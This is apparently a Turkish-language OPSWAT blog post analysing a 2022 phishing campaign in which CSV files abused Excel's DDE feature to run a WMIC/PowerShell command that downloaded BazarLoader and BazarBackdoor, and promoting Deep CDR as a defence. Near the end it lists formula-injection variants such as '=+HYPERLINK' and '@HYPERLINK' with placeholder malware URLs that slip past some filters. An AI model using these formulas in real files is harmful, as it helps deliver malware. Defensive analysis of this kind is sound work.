Şubat 2022'de kötü amaçlı yazılım araştırmacısı Chris Campbell, kullanıcıların cihazlarına BazarBackdoor truva atını bulaştırmak için özel olarak hazırlanmış CSV (virgülle ayrılmış değerler) metin dosyalarını kullanan yeni bir kimlik avı kampanyası tespit etti. Bu blog yazısında, saldırı senaryosunu analiz ediyor ve bu sofistike saldırıyı nasıl önleyebileceğinizi gösteriyoruz Deep CDR
(İçerik Silahsızlandırma ve Yeniden Yapılandırma).
Saldırı taktiği
Bu kimlik avı kampanyasında siber suçlular, verileri tablo biçiminde depolayan ve değerleri ayırmak için virgül kullanan sınırlandırılmış bir metin dosyası olan bir CSV dosyası kullanmıştır. Bu dosya türü, veritabanları ve uygulamalar arasında basit veri alışverişi yapmanın popüler bir yoludur. Bir CSV dosyası yürütülebilir kod içermeyen basit bir metin içerdiğinden, birçok kullanıcı bunun zararsız olduğunu düşünür ve belgeyi dikkat etmeden hızla açar. CSV dosyasının Microsoft Excel ve OpenOffice Calc gibi Dinamik Veri Alışverişini (DDE) destekleyen uygulamalarla açılması halinde dosyanın kötü amaçlı yazılımların cihazlarına girebileceği bir tehdit vektörü olabileceğinden şüphelenmezler. Bu uygulamalar CSV dosyasındaki formülleri ve fonksiyonları çalıştırabilir. Tehdit yazarları bu DDE özelliğini, BazarBackdoor truva atını indiren ve yükleyen rastgele komutları çalıştırmak, tehlikeye atmak ve dikkatsiz kurbanın cihazından kurumsal ağlara tam erişim elde etmek için kötüye kullanır. Bir MS Office dosyasına gizlenmiş kötü amaçlı bir makro veya VBA kodu içeren popüler saldırı yaklaşımlarıyla karşılaştırıldığında, DDE belgelerinin içine gizlenmiş tehditlerin tespit edilmesi daha zordur.
Dosyayı dikkatle incelediğimizde, veri sütunlarından birinde bulunan bir =WmiC| komutu (Windows Yönetim Arayüzü Komutu) görebiliriz. Kurbanlar yanlışlıkla bu DDE işlevinin çalışmasına izin verirse, bir PowerShell komutu oluşturacaktır. Komutlar daha sonra bir BazarLoader indirmek için uzak bir URL açacak ve BazarBackdoor kurbanın makinesine yüklenecektir.
Deep CDR DDE saldırılarına karşı savunmanıza nasıl yardımcı olur?
E-postalara eklenen dosyaları kullanıcılarınıza ulaşmadan önce sterilize ederek ağınızı bu sofistike kimlik avı kampanyalarına karşı koruyabilirsiniz. Her dosyanın potansiyel bir tehdit oluşturduğu zihniyetiyle ve sadece tespit etmek yerine önlemeye odaklanan Deep CDR , aynı dosya kullanılabilirliğini ve işlevselliğini korurken dosyalardaki tüm aktif içeriği çıkarır. Deep CDR , Sıfır Güven felsefesini gerçekten benimseyen MetaDefender - OPSWAT'un gelişmiş tehdit önleme platformundaki altı temel teknolojiden biridir.
Virüs bulaşmış CSV dosyasını MetaDefender Core ile işledikten sonra sanitizasyon ayrıntıları aşağıdadır (Tarama sonucunada bakabilirsiniz MetaDefender Cloud üzerinde). Deep CDR dosyadaki formülü etkisiz hale getirdi, böylece PowerShell komutu oluşturulmadı. Kötü amaçlı yazılım daha sonra indirilemedi.
Benzer saldırılarda, tehdit yazarları tespit edilmekten kaçınmak için daha karmaşık formüller kullanır. Normalde MS Excel'deki formüller eşittir işareti (=) ile başlar. Ancak bu uygulama sadece "=" yerine "=+"veya "@" gibi farklı bir işaretle başlayan formülleri de kabul ettiğinden, CSV dosyalarındaki yıkıcı formül şu şekilde olabilir:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Bu tür formüller bazı yaygın CDR sistemlerini atlatabilir. Ancak Deep CDR bu taktiğin üstesinden kolayca gelebilir ve temiz, tüketilmesi güvenli dosyalar üreterek tehdidi etkisiz hale getirebilir.
Hakkında daha fazla bilgi edinin Deep CDR veya kurumsal ağınızı ve kullanıcılarınızı sıfırıncı gün saldırılarından ve gelişmiş kötü amaçlı yazılımlardan koruyacak en iyi güvenlik çözümlerini keşfetmek için bir OPSWAT teknik uzmanıyla görüşün.
